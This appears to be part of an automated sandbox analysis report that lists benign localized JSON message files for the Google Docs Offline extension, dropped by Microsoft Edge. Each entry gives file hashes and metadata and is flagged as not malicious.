                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):968
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                        MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                        SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                        SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                        SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                        MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                        SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                        SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                        SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1305
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                        MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                        SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                        SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                        SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):911
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                        MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                        SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                        SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                        SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):939
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                        MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                        SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                        SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                        SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):972
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):990
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1672
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):935
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                        MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                        SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                        SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                        SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2771
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                        MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                        SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                        SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                        SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):858
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                        MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                        SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                        SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                        SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):954
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                        MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                        SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                        SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                        SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
